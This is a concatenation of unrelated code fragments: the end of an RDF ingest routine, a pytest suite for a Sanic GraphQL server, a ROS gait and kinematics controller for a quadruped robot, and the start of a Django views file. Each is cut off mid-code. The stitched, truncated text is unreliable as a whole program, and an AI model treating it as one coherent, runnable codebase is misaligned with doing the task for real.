updateURIs = statementURIs & existingURIs # Set of URIs for objects that may need to be updated
newObjects = self.createObjects(context, newURIs, statements)
updatedObjects = self.updateObjects(context, updateURIs, existingBrains, statements)
context.manage_delObjects([existingBrains[i]['id'].decode('utf-8') for i in deadURIs])
return IngestResults(newObjects, updatedObjects, deadURIs)
def _readLabcasSolr(self, labcasurl, labcas_sourceurl_prefix):
u'''Read the statements made at the RDF at ``url`` and return a
dictionary of {s → [{p → [o]}]} where | |
<reponame>tryagainconcepts/graphql-server
import json
from urllib.parse import urlencode
import pytest
from .app import create_app, url_string
from .schema import AsyncSchema
def response_json(response):
return json.loads(response.body.decode())
def json_dump_kwarg(**kwargs):
return json.dumps(kwargs)
def json_dump_kwarg_list(**kwargs):
return json.dumps([kwargs])
@pytest.mark.parametrize("app", [create_app()])
def test_allows_get_with_query_param(app):
_, response = app.client.get(uri=url_string(query="{test}"))
assert response.status == 200
assert response_json(response) == {"data": {"test": "Hello World"}}
@pytest.mark.parametrize("app", [create_app()])
def test_allows_get_with_variable_values(app):
_, response = app.client.get(
uri=url_string(
query="query helloWho($who: String){ test(who: $who) }",
variables=json.dumps({"who": "Dolly"}),
)
)
assert response.status == 200
assert response_json(response) == {"data": {"test": "Hello Dolly"}}
@pytest.mark.parametrize("app", [create_app()])
def test_allows_get_with_operation_name(app):
_, response = app.client.get(
uri=url_string(
query="""
query helloYou { test(who: "You"), ...shared }
query helloWorld { test(who: "World"), ...shared }
query helloDolly { test(who: "Dolly"), ...shared }
fragment shared on QueryRoot {
shared: test(who: "Everyone")
}
""",
operationName="helloWorld",
)
)
assert response.status == 200
assert response_json(response) == {
"data": {"test": "Hello World", "shared": "Hello Everyone"}
}
@pytest.mark.parametrize("app", [create_app()])
def test_reports_validation_errors(app):
_, response = app.client.get(
uri=url_string(query="{ test, unknownOne, unknownTwo }")
)
assert response.status == 400
assert response_json(response) == {
"errors": [
{
"message": "Cannot query field 'unknownOne' on type 'QueryRoot'.",
"locations": [{"line": 1, "column": 9}],
},
{
"message": "Cannot query field 'unknownTwo' on type 'QueryRoot'.",
"locations": [{"line": 1, "column": 21}],
},
]
}
@pytest.mark.parametrize("app", [create_app()])
def test_errors_when_missing_operation_name(app):
_, response = app.client.get(
uri=url_string(
query="""
query TestQuery { test }
mutation TestMutation { writeTest { test } }
"""
)
)
assert response.status == 400
assert response_json(response) == {
"errors": [
{
"message": "Must provide operation name"
" if query contains multiple operations.",
}
]
}
@pytest.mark.parametrize("app", [create_app()])
def test_errors_when_sending_a_mutation_via_get(app):
_, response = app.client.get(
uri=url_string(
query="""
mutation TestMutation { writeTest { test } }
"""
)
)
assert response.status == 405
assert response_json(response) == {
"errors": [
{
"message": "Can only perform a mutation operation from a POST request.",
}
]
}
@pytest.mark.parametrize("app", [create_app()])
def test_errors_when_selecting_a_mutation_within_a_get(app):
_, response = app.client.get(
uri=url_string(
query="""
query TestQuery { test }
mutation TestMutation { writeTest { test } }
""",
operationName="TestMutation",
)
)
assert response.status == 405
assert response_json(response) == {
"errors": [
{
"message": "Can only perform a mutation operation from a POST request.",
}
]
}
@pytest.mark.parametrize("app", [create_app()])
def test_allows_mutation_to_exist_within_a_get(app):
_, response = app.client.get(
uri=url_string(
query="""
query TestQuery { test }
mutation TestMutation { writeTest { test } }
""",
operationName="TestQuery",
)
)
assert response.status == 200
assert response_json(response) == {"data": {"test": "Hello World"}}
@pytest.mark.parametrize("app", [create_app()])
def test_allows_post_with_json_encoding(app):
_, response = app.client.post(
uri=url_string(),
data=json_dump_kwarg(query="{test}"),
headers={"content-type": "application/json"},
)
assert response.status == 200
assert response_json(response) == {"data": {"test": "Hello World"}}
@pytest.mark.parametrize("app", [create_app()])
def test_allows_sending_a_mutation_via_post(app):
_, response = app.client.post(
uri=url_string(),
data=json_dump_kwarg(query="mutation TestMutation { writeTest { test } }"),
headers={"content-type": "application/json"},
)
assert response.status == 200
assert response_json(response) == {"data": {"writeTest": {"test": "Hello World"}}}
@pytest.mark.parametrize("app", [create_app()])
def test_allows_post_with_url_encoding(app):
# Example of how sanic does send data using url enconding
# can be found at their repo.
# https://github.com/huge-success/sanic/blob/master/tests/test_requests.py#L927
payload = "query={test}"
_, response = app.client.post(
uri=url_string(),
data=payload,
headers={"content-type": "application/x-www-form-urlencoded"},
)
assert response.status == 200
assert response_json(response) == {"data": {"test": "Hello World"}}
@pytest.mark.parametrize("app", [create_app()])
def test_supports_post_json_query_with_string_variables(app):
_, response = app.client.post(
uri=url_string(),
data=json_dump_kwarg(
query="query helloWho($who: String){ test(who: $who) }",
variables=json.dumps({"who": "Dolly"}),
),
headers={"content-type": "application/json"},
)
assert response.status == 200
assert response_json(response) == {"data": {"test": "Hello Dolly"}}
@pytest.mark.parametrize("app", [create_app()])
def test_supports_post_json_query_with_json_variables(app):
_, response = app.client.post(
uri=url_string(),
data=json_dump_kwarg(
query="query helloWho($who: String){ test(who: $who) }",
variables={"who": "Dolly"},
),
headers={"content-type": "application/json"},
)
assert response.status == 200
assert response_json(response) == {"data": {"test": "Hello Dolly"}}
@pytest.mark.parametrize("app", [create_app()])
def test_supports_post_url_encoded_query_with_string_variables(app):
_, response = app.client.post(
uri=url_string(),
data=urlencode(
dict(
query="query helloWho($who: String){ test(who: $who) }",
variables=json.dumps({"who": "Dolly"}),
)
),
headers={"content-type": "application/x-www-form-urlencoded"},
)
assert response.status == 200
assert response_json(response) == {"data": {"test": "Hello Dolly"}}
@pytest.mark.parametrize("app", [create_app()])
def test_supports_post_json_query_with_get_variable_values(app):
_, response = app.client.post(
uri=url_string(variables=json.dumps({"who": "Dolly"})),
data=json_dump_kwarg(
query="query helloWho($who: String){ test(who: $who) }",
),
headers={"content-type": "application/json"},
)
assert response.status == 200
assert response_json(response) == {"data": {"test": "Hello Dolly"}}
@pytest.mark.parametrize("app", [create_app()])
def test_post_url_encoded_query_with_get_variable_values(app):
_, response = app.client.post(
uri=url_string(variables=json.dumps({"who": "Dolly"})),
data=urlencode(
dict(
query="query helloWho($who: String){ test(who: $who) }",
)
),
headers={"content-type": "application/x-www-form-urlencoded"},
)
assert response.status == 200
assert response_json(response) == {"data": {"test": "Hello Dolly"}}
@pytest.mark.parametrize("app", [create_app()])
def test_supports_post_raw_text_query_with_get_variable_values(app):
_, response = app.client.post(
uri=url_string(variables=json.dumps({"who": "Dolly"})),
data="query helloWho($who: String){ test(who: $who) }",
headers={"content-type": "application/graphql"},
)
assert response.status == 200
assert response_json(response) == {"data": {"test": "Hello Dolly"}}
@pytest.mark.parametrize("app", [create_app()])
def test_allows_post_with_operation_name(app):
_, response = app.client.post(
uri=url_string(),
data=json_dump_kwarg(
query="""
query helloYou { test(who: "You"), ...shared }
query helloWorld { test(who: "World"), ...shared }
query helloDolly { test(who: "Dolly"), ...shared }
fragment shared on QueryRoot {
shared: test(who: "Everyone")
}
""",
operationName="helloWorld",
),
headers={"content-type": "application/json"},
)
assert response.status == 200
assert response_json(response) == {
"data": {"test": "Hello World", "shared": "Hello Everyone"}
}
@pytest.mark.parametrize("app", [create_app()])
def test_allows_post_with_get_operation_name(app):
_, response = app.client.post(
uri=url_string(operationName="helloWorld"),
data="""
query helloYou { test(who: "You"), ...shared }
query helloWorld { test(who: "World"), ...shared }
query helloDolly { test(who: "Dolly"), ...shared }
fragment shared on QueryRoot {
shared: test(who: "Everyone")
}
""",
headers={"content-type": "application/graphql"},
)
assert response.status == 200
assert response_json(response) == {
"data": {"test": "Hello World", "shared": "Hello Everyone"}
}
@pytest.mark.parametrize("app", [create_app(pretty=True)])
def test_supports_pretty_printing(app):
_, response = app.client.get(uri=url_string(query="{test}"))
assert response.body.decode() == (
"{\n" ' "data": {\n' ' "test": "Hello World"\n' " }\n" "}"
)
@pytest.mark.parametrize("app", [create_app(pretty=False)])
def test_not_pretty_by_default(app):
_, response = app.client.get(url_string(query="{test}"))
assert response.body.decode() == '{"data":{"test":"Hello World"}}'
@pytest.mark.parametrize("app", [create_app()])
def test_supports_pretty_printing_by_request(app):
_, response = app.client.get(uri=url_string(query="{test}", pretty="1"))
assert response.body.decode() == (
"{\n" ' "data": {\n' ' "test": "Hello World"\n' " }\n" "}"
)
@pytest.mark.parametrize("app", [create_app()])
def test_handles_field_errors_caught_by_graphql(app):
_, response = app.client.get(uri=url_string(query="{thrower}"))
assert response.status == 200
assert response_json(response) == {
"data": None,
"errors": [
{
"locations": [{"column": 2, "line": 1}],
"message": "Throws!",
"path": ["thrower"],
}
],
}
@pytest.mark.parametrize("app", [create_app()])
def test_handles_syntax_errors_caught_by_graphql(app):
_, response = app.client.get(uri=url_string(query="syntaxerror"))
assert response.status == 400
assert response_json(response) == {
"errors": [
{
"locations": [{"column": 1, "line": 1}],
"message": "Syntax Error: Unexpected Name 'syntaxerror'.",
}
]
}
@pytest.mark.parametrize("app", [create_app()])
def test_handles_errors_caused_by_a_lack_of_query(app):
_, response = app.client.get(uri=url_string())
assert response.status == 400
assert response_json(response) == {
"errors": [{"message": "Must provide query string."}]
}
@pytest.mark.parametrize("app", [create_app()])
def test_handles_batch_correctly_if_is_disabled(app):
_, response = app.client.post(
uri=url_string(), data="[]", headers={"content-type": "application/json"}
)
assert response.status == 400
assert response_json(response) == {
"errors": [
{
"message": "Batch GraphQL requests are not enabled.",
}
]
}
@pytest.mark.parametrize("app", [create_app()])
def test_handles_incomplete_json_bodies(app):
_, response = app.client.post(
uri=url_string(), data='{"query":', headers={"content-type": "application/json"}
)
assert response.status == 400
assert response_json(response) == {
"errors": [{"message": "POST body sent invalid JSON."}]
}
@pytest.mark.parametrize("app", [create_app()])
def test_handles_plain_post_text(app):
_, response = app.client.post(
uri=url_string(variables=json.dumps({"who": "Dolly"})),
data="query helloWho($who: String){ test(who: $who) }",
headers={"content-type": "text/plain"},
)
assert response.status == 400
assert response_json(response) == {
"errors": [{"message": "Must provide query string."}]
}
@pytest.mark.parametrize("app", [create_app()])
def test_handles_poorly_formed_variables(app):
_, response = app.client.get(
uri=url_string(
query="query helloWho($who: String){ test(who: $who) }", variables="who:You"
)
)
assert response.status == 400
assert response_json(response) == {
"errors": [{"message": "Variables are invalid JSON."}]
}
@pytest.mark.parametrize("app", [create_app()])
def test_handles_unsupported_http_methods(app):
_, response = app.client.put(uri=url_string(query="{test}"))
assert response.status == 405
assert response.headers["Allow"] in ["GET, POST", "HEAD, GET, POST, OPTIONS"]
assert response_json(response) == {
"errors": [
{
"message": "GraphQL only supports GET and POST requests.",
}
]
}
@pytest.mark.parametrize("app", [create_app()])
def test_passes_request_into_request_context(app):
_, response = app.client.get(uri=url_string(query="{request}", q="testing"))
assert response.status == 200
assert response_json(response) == {"data": {"request": "testing"}}
@pytest.mark.parametrize("app", [create_app(context={"session": "CUSTOM CONTEXT"})])
def test_passes_custom_context_into_context(app):
_, response = app.client.get(uri=url_string(query="{context { session request }}"))
assert response.status_code == 200
res = response_json(response)
assert "data" in res
assert "session" in res["data"]["context"]
assert "request" in res["data"]["context"]
assert "CUSTOM CONTEXT" in res["data"]["context"]["session"]
assert "Request" in res["data"]["context"]["request"]
@pytest.mark.parametrize("app", [create_app(context="CUSTOM CONTEXT")])
def test_context_remapped_if_not_mapping(app):
_, response = app.client.get(uri=url_string(query="{context { session request }}"))
assert response.status_code == 200
res = response_json(response)
assert "data" in res
assert "session" in res["data"]["context"]
assert "request" in res["data"]["context"]
assert "CUSTOM CONTEXT" not in res["data"]["context"]["request"]
assert "Request" in res["data"]["context"]["request"]
@pytest.mark.parametrize("app", [create_app()])
def test_post_multipart_data(app):
query = "mutation TestMutation { writeTest { test } }"
data = (
"------sanicgraphql\r\n"
+ 'Content-Disposition: form-data; name="query"\r\n'
+ "\r\n"
+ query
+ "\r\n"
+ "------sanicgraphql--\r\n"
+ "Content-Type: text/plain; charset=utf-8\r\n"
+ 'Content-Disposition: form-data; name="file"; filename="text1.txt"; filename*=utf-8\'\'text1.txt\r\n'
+ "\r\n"
+ "\r\n"
+ "------sanicgraphql--\r\n"
)
_, response = app.client.post(
uri=url_string(),
data=data,
headers={"content-type": "multipart/form-data; boundary=----sanicgraphql"},
)
assert response.status == 200
assert response_json(response) == {"data": {"writeTest": {"test": "Hello World"}}}
@pytest.mark.parametrize("app", [create_app(batch=True)])
def test_batch_allows_post_with_json_encoding(app):
_, response = app.client.post(
uri=url_string(),
data=json_dump_kwarg_list(id=1, query="{test}"),
headers={"content-type": "application/json"},
)
assert response.status == 200
assert response_json(response) == [{"data": {"test": "Hello World"}}]
@pytest.mark.parametrize("app", [create_app(batch=True)])
def test_batch_supports_post_json_query_with_json_variables(app):
_, response = app.client.post(
uri=url_string(),
data=json_dump_kwarg_list(
id=1,
query="query helloWho($who: String){ test(who: $who) }",
variables={"who": "Dolly"},
),
headers={"content-type": "application/json"},
)
assert response.status == 200
assert response_json(response) == [{"data": {"test": "Hello Dolly"}}]
@pytest.mark.parametrize("app", [create_app(batch=True)])
def test_batch_allows_post_with_operation_name(app):
_, response | |
#!/usr/bin/env python
# coding:utf-8
import rospy
import numpy as np
import time
import threading
from math import *
from collections import deque
from settings_new import *
from super_minitaur.msg import *
from std_msgs.msg import *
from scipy.interpolate import interp1d
import matplotlib.pyplot as plt
class LegControl:
def __init__(self,name):
self.name = name + "_leg"
self.control_puber = rospy.Publisher("Odrive/" + name + "/control",LegControlMsg,queue_size=10)
self.para_puber = rospy.Publisher("Odrive/parameter",OdriveParamMsg,queue_size=10)
self.cur_suber = rospy.Subscriber("Odrive/" + name + "/actual_current",FourLegCurrentMsg,self.cur_callback)
self.pos_suber = rospy.Subscriber("Odrive/" + name + "/actual_pos",FourLegPosMsg,self.pos_callback)
self.leg_name = name
self.actual_pos = [0.,-0.25] # [x,y] M
self.actual_vel = [0,0] # [x,y] M
self.t = time.time()
self.actual_cur = [0,0] # [I_M0,I_M1] A
self.actual_motor_angle = [0,0] # [front, rear] rad
self.cur_deque = deque(maxlen=3)
self.pos_x_p = 0.
self.pos_x_d = 0.
self.pos_x_i = 0.
def is_touch(self,thres=25):
'''
test whether touch ground
'''
self.cur_deque.append(self.actual_cur)
I_M0 = [item[0] for item in self.cur_deque]
I_M1 = [item[1] for item in self.cur_deque]
if np.var(I_M0) < 100 and np.mean(I_M0) > thres:
return 1
if np.var(I_M1) < 100 and np.mean(I_M1) > thres:
return 1
return 0
def WritePosMsg(self,pos):
alpha,beta = InverseForAll(pos[0],pos[1],LEG_LENGTH)
self.control_puber.publish(LegControlMsg(3,0,alpha,beta))
# def CloseLoopPos(self,pos):
# """
# 闭环控制末端位置,基于电流模式
# """
# spin_rate = 0.01
# pos_error_int = np.array(np.zeros(2))
# while :
# pos_estimate = self.actual_pos
# pos_error = np.array(pos) - np.array(pos_estimate)
# pos_error_dt = pos_error / spin_rate
# pos_error_int += pos_error
# force_x = self.pos_x_p * pos_error[0] + self.pos_x_d * pos_error[0] + self.pos_y_i *
def WriteCurMsg(self,cur):
self.control_puber.publish(LegControlMsg(1,0,cur[0],cur[1]))
def Set_para(self,pos_gain = ODRV_POS_GAIN,
vel_gain = ODRV_VEL_GAIN,
vel_integrator_gain = ODRV_VEL_INTEGRATOR_GAIN,
vel_limit = ODRV_VEL_LIMIT,
current_limit = ODRV_CURRENT_LIM):
msg = OdriveParamMsg()
msg.odrive_index = self.leg_name
msg.pos_gain = pos_gain
msg.vel_gain = vel_gain
msg.vel_integrator_gain = vel_integrator_gain
msg.vel_limit = vel_limit
msg.current_limit = current_limit
self.para_puber.publish(msg)
def cur_callback(self,msg):
self.actual_cur = [abs(msg.front_current),abs(msg.rear_current)]
def pos_callback(self,msg):
self.actual_motor_angle = [msg.alpha,msg.beta]
# 正运动学
alpha = -msg.alpha
beta = -msg.beta
theta1 = (alpha+beta)/2
theta2 = (alpha-beta)/2
l1 = LEG_LENGTH[0]
l2 = LEG_LENGTH[1]
L = -l1*sin(theta1)+sqrt(pow(l2,2)-pow(l1,2)*pow(cos(theta1),2))
x = L * sin(theta2)
y = - L * cos(theta2)
theta3 = theta2 + asin(l1 * cos(theta1) / l2)
# theta3 = theta2 - asin(l1 * cos(theta1) / l2)
x = x + DELTA_L2 * sin(theta3)
y = y - DELTA_L2 * cos(theta3)
vel = self.actual_vel
self.actual_vel =(np.array([x,y])-self.actual_pos)/(time.time()-self.t)
self.actual_acc =(self.actual_vel-vel)/(time.time()-self.t)
self.actual_pos = [x,y]
self.t = time.time()
def leg_length(self):
return sqrt(pow(self.actual_pos[0], 2) + pow(self.actual_pos[1], 2))
def leg_squat(self,squat_pos=np.array([0,-0.27])):
t = 0
T = 0.1
spin_rate = 0.05
while t<T:
xs = (-self.actual_pos[0] + squat_pos[0])*t/T+self.actual_pos[0]
ys = (-self.actual_pos[1] + squat_pos[1])*t/T+self.actual_pos[1]
self.WritePosMsg([xs,ys])
t+=spin_rate
# time.sleep(spin_rate)
def leg_check(self,index,ADJUST_OFFSET=[-0.01,-0.01,-0.01,-0.01],ADJUST_HEIGHT=-0.25,step_height=0.03):
if abs(self.actual_pos[0]-ADJUST_OFFSET[index])>0.02 or abs(self.actual_pos[1]-ADJUST_HEIGHT)>0.02:
self.WritePosMsg([ADJUST_OFFSET[index],ADJUST_HEIGHT+step_height])
time.sleep(0.02)
self.WritePosMsg([ADJUST_OFFSET[index],ADJUST_HEIGHT])
return 1
return 0
def InverseForAll(x_f, y_f, LEG_LENGTH): # x_f,y_f 为足端球心坐标
C1 = pow(x_f,2) + pow(y_f,2) + pow(LEG_LENGTH[0],2) - pow((LEG_LENGTH[1]+DELTA_L2),2) # 中间常量
A = 1 + pow(x_f,2) / pow(y_f,2)
B = -C1 * x_f / pow(y_f,2)
C = pow(C1,2) / (4 * pow(y_f,2)) - pow(LEG_LENGTH[0],2)
x_knee = (-B - sqrt(pow(B,2) - 4*A*C))/(2 * A)
# x_knee = (-B + sqrt(pow(B,2) - 4*A*C))/(2 * A)
y_knee = (C1 - 2*x_f*x_knee)/(2*y_f)
scall = (DELTA_L2) / (LEG_LENGTH[1] + DELTA_L2)
x = x_f + (x_knee-x_f)*scall
y = y_f + (y_knee-y_f)*scall
# 以下的xy为脚踝关节xy
x = -x
l1 = LEG_LENGTH[0]
l2 = LEG_LENGTH[1]
L = sqrt(x*x+y*y)
psi = asin(x/L)
phi = acos((l1*l1+L*L-l2*l2)/(2*l1*L))
theta1 = phi - psi
theta2 = phi + psi
alpha = pi/2 - theta1
beta = pi/2 - theta2
return alpha, beta
class minitaur:
def __init__(self):
rospy.init_node('super_control',anonymous=True)
self.LegControllers = [LegControl("RF"),
LegControl("RB"),
LegControl("LF"),
LegControl("LB")]
self.imu_suber = rospy.Subscriber("super_minitaur/imu_data",ImuMsg,self.imu_callback)
self.state_suber = rospy.Subscriber("super_minitaur/state_change",String,self.state_callback)
self.Euler = [0,0,0]
self.Init()
self.state = 'IDLE'
self.run()
def Init(self):
print("Waiting for Odrive")
while rospy.get_param('Odrive_ready_flag') == 0:
time.sleep(0.1)
print("Odrive is Ready")
def imu_callback(self,msg):
self.Euler = [msg.yaw,
msg.pitch,
msg.roll]
def state_callback(self,msg):
self.state = msg.data
DEFAULT_POS = [[[0.03,-0.25],
[-0.03,-0.25],
[0.03,-0.25],
[-0.03,-0.25]]]
def MoveLegsP2P(self,target_pos= DEFAULT_POS ,run_time = 0.5,frequency = 40):
'''
target_pos = [ [[x1,y1],[x2,y2],[x3,y3],[x4,y4]],
[[x1,y1],[x2,y2],[x3,y3],[x4,y4]],
.... ]
T_STAND = 0.2 #float is necessary
STEP_FREQUENCY = 25 #float is necessary
'''
run_time = float(run_time)
target_pos_temp = list(target_pos)
if len(target_pos_temp) == 0:
rospy.logerr("target_pos is empty!")
return -1
if len(target_pos_temp) == 1:
mode = 'linear'
else:
mode = 'cubic'
target_pos_temp.insert(0,[leg.actual_pos for leg in self.LegControllers])
#target_pos_temp = [ [[x1,y1],[x2,y2],[x3,y3],[x4,y4]], actual pos
# [[x1,y1],[x2,y2],[x3,y3],[x4,y4]],
# [[x1,y1],[x2,y2],[x3,y3],[x4,y4]],
# .... ]
x = [[item[i][0] for item in target_pos_temp] for i in range(4)]
y = [[item[i][1] for item in target_pos_temp] for i in range(4)]
#x = [[x1,x1,x1,x1...],[x2,x2,x2,x2...],[x3,x3,x3,x3...],[x4,x4,x4,x4...]]
# functs = [interp1d(x[i],y[i],kind = mode) for i in range(4)]
functs = [0, 0, 0, 0]
for i in range(4):
if (x[i].count(x[i][1]) >= len(x[i]) - 1 or y[i].count(y[i][1]) >= len(y[i]) - 1):
functs[i] = interp1d(x[i], y[i], kind='linear')
else:
functs[i] = interp1d(x[i], y[i], kind=mode)
#functs = [f1,f2,f3,f4]
xxs = [np.linspace(target_pos_temp[0][i][0],
target_pos_temp[-1][i][0], frequency) for i in range(4)]
#xxs = [[x1,x1,x1,x1...],[x2,x2,x2,x2...],[x3,x3,x3,x3...],[x4,x4,x4,x4...]]
yys = [functs[i](xxs[i]) for i in range(4)]
#yys = [[y1,y1,y1,y1...],[y2,y2,y2,x2...],[x3,x3,x3,x3...],[x4,x4,x4,x4...]]
for i in range(int(frequency)):
for index,leg in enumerate(self.LegControllers):
pos = [xxs[index][i],yys[index][i]]
leg.WritePosMsg(pos)
#print self.LegControllers[2].is_touch(thres = 15)
time.sleep(run_time/frequency)
def run(self):
while not rospy.is_shutdown():
if self.state == 'SQUAT':
self.Squat()
if self.state == 'TRIAL1':
self.Trial1()
if self.state == 'TRIAL2':
self.Trial2()
if self.state == 'TRIAL3':
self.Trial3()
if self.state == 'TRIAL4':
self.Trial4()
if self.state == 'TROT':
self.Trot()
if self.state == 'TROT_IN_PLACE':
self.Trot_in_place()
if self.state == 'CRAWL':
self.Crawl()
if self.state == 'TURN':
self.Turn()
if self.state == 'JUMP':
self.JumpCurrent()
if self.state == 'TEST':
t = time.time()
for i in range(1000):
print(self.Euler)
print(time.time()-t)
self.state = 'IDLE'
if self.state == 'ADJUST':
self.Adjust()
if self.state == 'UPSLOPE':
self.Upslope()
if self.state == 'ZERO':
self.ZeroForceControl(self.LegControllers[3])
time.sleep(0.1)
def Adjust(self,offset=[0.03,-0.03,0.03,-0.03]):
flag=[1,1,1,1]
while sum(flag):
for index, leg in enumerate(self.LegControllers):
flag[index]=leg.leg_check(index,offset)
time.sleep(0.1)
print(flag)
print('FINISH')
self.state = 'IDLE'
def PID_test(self):
PID = [np.array([270, 240]), np.array([10, 8]), np.array([20, 20])]
leg = self.LegControllers[3]
posErrSum = 0.
theo_acc = np.array([0, 0])
theo_pos = leg.actual_pos + np.array([0.05, 0.])
theo_vel = np.array([0.,0.])
t = time.time()
rate = 0.0025
xs = []
ys = []
T=1
old_time = time.time()
while time.time()-t<T:
xs.append(leg.actual_pos[0])
ys.append(leg.actual_pos[1])
posErrSum += (theo_pos-leg.actual_pos)*(time.time() - old_time)
old_time = time.time()
force = PID[0]*(theo_pos-leg.actual_pos)+PID[1]*(theo_vel-leg.actual_vel)+PID[2]*posErrSum+theo_acc
self.WriteForce(leg, force)
time.sleep(rate)
print (theo_pos - leg.actual_pos)
self.WriteForce(leg, [0, 0])
ts = np.linspace(0, T, len(xs))
plt.plot(ts, xs, 'b')
# plt.plot(ts, ys, 'r')
plt.show()
self.state = "IDLE"
def PIDControl(self,T,x,y,x_,y_):
PID = [np.array([270, 240]), np.array([10, 8]), np.array([20, 20])]
leg = self.LegControllers[3]
posErrSum = 0.
theo_acc = np.array([0, 0])
theo_pos = np.array([x,y])
theo_vel = np.array([x_, y_])
t = time.time()
rate = 0.0025
old_time = time.time()
while time.time()-t<T:
posErrSum += (theo_pos-leg.actual_pos)*(time.time() - old_time)
old_time = time.time()
force = PID[0]*(theo_pos-leg.actual_pos)+PID[1]*(theo_vel-leg.actual_vel)+PID[2]*posErrSum+theo_acc
self.WriteForce(leg, force)
time.sleep(rate)
def Circle_test(self):
t=0
T=2.5
spin_rate=0.01
a = 0.05
leg=self.LegControllers[3]
offset=leg.actual_pos
xs = []
ys = []
xs_theo = []
ys_theo = []
while t<T:
xs.append(leg.actual_pos[0])
ys.append(leg.actual_pos[1])
x = a*sin(2*pi*t/T)+offset[0]
y = a*cos(2*pi*t/T)+offset[1]
xs_theo.append(x)
ys_theo.append(y)
x_ = 0.75*a*2*pi/T*cos(2*pi*t/T)
y_ = -0.75*a*2*pi/T*sin(2*pi*t/T)
self.PIDControl(spin_rate,x,y,x_,y_)
t = t+spin_rate
self.LegControllers[3].WriteCurMsg([0, 0])
self.state = 'IDLE'
plt.plot(xs, ys, 'b')
plt.plot(xs_theo, ys_theo, 'r')
plt.show()
def Squat(self):
self.MoveLegsP2P(target_pos=[[[STAND_OFFSET[i], SQUAT_HEIGHT] for i in range(4)]],run_time=0.5,frequency=40)
self.state = 'IDLE'
def Trot(self):
T = 0.5
t1 = T/6.0
t2 = T/6.0*5
step_length = 0.1
min_height = -0.24
step_height_up = 0.04
step_height_down = 0.02
spin_rate = 0.01
t = 0.0
TROT_OFFSET = [0.03, -0.03, 0.03, -0.03]
for index,leg in enumerate(self.LegControllers):
leg.Set_para(pos_gain = 60, vel_gain = 0.001)
self.MoveLegsP2P(target_pos=[[[TROT_OFFSET[0],min_height], [-step_length/2,min_height],
[TROT_OFFSET[0],min_height], [-step_length/2,min_height]]],run_time=0.5,frequency=40)
while not rospy.is_shutdown():
t = t%T
if t < t1:
xs = t/t1*step_length-step_length/2
ys = step_height_up*sin(t/t1*pi)+min_height
self.LegControllers[0].WritePosMsg([xs+TROT_OFFSET[0], ys])
self.LegControllers[3].WritePosMsg([xs+TROT_OFFSET[1], ys])
elif (t - t1) < t2:
xs = -(t-t1)/t2*step_length+step_length/2
ys = step_height_down*-sin((t-t1)/t2*pi)+min_height
self.LegControllers[0].WritePosMsg([xs+TROT_OFFSET[0], ys])
self.LegControllers[3].WritePosMsg([xs+TROT_OFFSET[1], ys])
t_other = t+T/2
t_other=t_other%T
if t_other < t1:
xs = t_other/t1*step_length-step_length/2
ys = step_height_up*sin(t_other/t1*pi)+min_height
self.LegControllers[1].WritePosMsg([xs+TROT_OFFSET[1], ys])
self.LegControllers[2].WritePosMsg([xs+TROT_OFFSET[0], ys])
elif (t_other-t1) < t2:
xs = -(t_other-t1)/t2*step_length+step_length/2
ys = step_height_down*-sin((t_other-t1)/t2*pi)+min_height
self.LegControllers[1].WritePosMsg([xs+TROT_OFFSET[1], ys])
self.LegControllers[2].WritePosMsg([xs+TROT_OFFSET[0], ys])
t += spin_rate
time.sleep(spin_rate)
if self.state != 'TROT':
break
def Upslope(self):
T = 0.5
t1 = T/6.0
t2 = T/6.0*5
step_length = 0.05
min_height = -0.25
step_height_up = 0.03
step_height_down = 0.02
spin_rate = 0.01
t = 0.0
TROT_OFFSET = [-0.0, -0.0, -0.0, -0.0]
self.Adjust(TROT_OFFSET)
self.state = 'UPSLOPE'
while not rospy.is_shutdown():
x_offset = 1.2*min_height*tan(self.Euler[1]/180*pi)
print(t)
print(x_offset)
t = t%T
if t < t1:
xs = t/t1*step_length-step_length/2+x_offset
ys = step_height_up*sin(t/t1*pi)+min_height
self.LegControllers[0].WritePosMsg([xs+TROT_OFFSET[0], ys])
self.LegControllers[3].WritePosMsg([xs+TROT_OFFSET[1], ys])
elif (t - t1) < t2:
xs = -(t-t1)/t2*step_length+step_length/2+x_offset
ys = step_height_down*-sin((t-t1)/t2*pi)+min_height
self.LegControllers[0].WritePosMsg([xs+TROT_OFFSET[0], ys])
self.LegControllers[3].WritePosMsg([xs+TROT_OFFSET[1], ys])
t_other = t+T/2
t_other=t_other%T
if t_other < t1:
xs = t_other/t1*step_length-step_length/2+x_offset
ys = step_height_up*sin(t_other/t1*pi)+min_height
self.LegControllers[1].WritePosMsg([xs+TROT_OFFSET[1], ys])
self.LegControllers[2].WritePosMsg([xs+TROT_OFFSET[0], ys])
elif (t_other-t1) < t2:
xs = -(t_other-t1)/t2*step_length+step_length/2+x_offset
ys = step_height_down*-sin((t_other-t1)/t2*pi)+min_height
self.LegControllers[1].WritePosMsg([xs+TROT_OFFSET[1], ys])
| |
<gh_stars>0
"""
This file defines backend code that runs when a user visits a page
"""
from datetime import datetime
from typing import Optional
from django.contrib import messages
from django.contrib.auth.mixins import LoginRequiredMixin, UserPassesTestMixin
from django.core import mail
from django.db.models import Q, QuerySet
from django.forms import Form
from django.http import HttpResponse, HttpResponseRedirect, Http404
from django.shortcuts import redirect, render
from django.template.loader import render_to_string
from django.urls import reverse_lazy
from django.views import View
from django.views.generic import TemplateView, CreateView, UpdateView, DeleteView, DetailView, ListView
from django.views.generic.base import ContextMixin
from django.views.generic.edit import FormMixin, DeletionMixin
from Users.models import User
from . import models, forms
# Email Utility Functions
def send_email(subject_template: str, text_template: str, template_name: str, review: models.Review,
query_set: QuerySet):
"""
This function sends an email to a group of users
:param subject_template: Defines what the subject of the email will be
:type subject_template: str
:param text_template: Defines what the text content will be
:type text_template: str
:param template_name: Defines what template to use for the html content of the email
:type template_name: str
:param review: The Review this email pertains to
:type review: models.Review
:param query_set: The QuerySet of users to send the email to
:type query_set: QuerySet
"""
for user in list(query_set.filter(receive_notifications=True)):
html_content = render_to_string(template_name, {'target_user': user, 'review': review})
text_content = text_template.format(target_user=str(user), student=str(review.student),
reviewer=str(review.reviewer))
subject = subject_template.format(target_user=str(user), student=str(review.student),
reviewer=str(review.reviewer))
message = mail.EmailMultiAlternatives(subject=f'{review.student.session} | {subject}', body=text_content)
message.attach_alternative(html_content, "text/html")
message.to = [user.email]
message.send()
# Mixins
"""
These mixins provide common functionality to Views
"""
class IsSuperUserMixin(UserPassesTestMixin):
"""
This Mixin ensures the user is an admin (instructor)
"""
request = None
def test_func(self) -> bool:
"""
This is the function run to test the user
:returns: The user's superuser status
:rtype: bool
"""
return self.request.user.is_superuser
